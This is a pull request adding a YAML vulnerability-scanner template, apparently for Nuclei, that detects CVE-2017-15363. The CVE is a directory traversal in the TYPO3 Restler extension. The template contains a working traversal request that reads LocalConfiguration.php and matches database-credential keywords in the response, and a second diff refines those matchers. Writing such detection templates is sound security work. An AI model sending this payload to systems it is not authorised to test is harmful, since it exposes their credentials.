### PR TITLE
Create CVE-2017-15363.yaml

### DIFF
--- a/CVE-2017-15363.yaml
+++ b/CVE-2017-15363.yaml
@@ -1,0 +1,36 @@
+id: CVE-2017-15363
+info:
+  name: Typo3 Restler Extension - Local File Disclosure
+  author: 0x_Akoko
+  severity: high
+  description: Directory traversal vulnerability in public/examples/resources/getsource.php in Luracast Restler through 3.0.0, as used in the restler extension before 1.7.1 for TYPO3, allows remote attackers to read arbitrary files via the file parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/42985
+    - https://www.cvedetails.com/cve/CVE-2017-15363
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2017-15363
+    cwe-id: CWE-98
+  tags: cve,cve2017,restler,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "database"
+          - "host"
+          - "password"
+          - "port"
+          - "username"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200

--- a/cves/2017/CVE-2017-15363.yaml
+++ b/cves/2017/CVE-2017-15363.yaml
@@ -22,13 +22,13 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
-        words:
-          - "database"
-          - "host"
-          - "password"
-          - "port"
-          - "username"
         part: body
+        words:
+          - "<?php"
+          - "'host'"
+          - "'database'"
+          - "'extConf'"
+          - "'debug'"
         condition: and
 
       - type: status


### PR DESCRIPTION
### Template / PR Information

**Typo3 Restler Extension - Local File Disclosure**

**Authentication : Not required (Authentication is not required to exploit the vulnerability.)**

Directory traversal vulnerability in public/examples/resources/getsource.php in Luracast Restler through 3.0.0, as used in the restler extension before 1.7.1 for TYPO3, allows remote attackers to read arbitrary files via the file parameter.

Vendor Homepage: https://www.aoe.com/
Software Link: https://extensions.typo3.org/extension/restler/
Version: 1.7.0 (last)
  reference:
    - https://www.exploit-db.com/exploits/42985
    - https://www.cvedetails.com/cve/CVE-2017-15363

### Template Validation

I've validated this template locally?
- YES
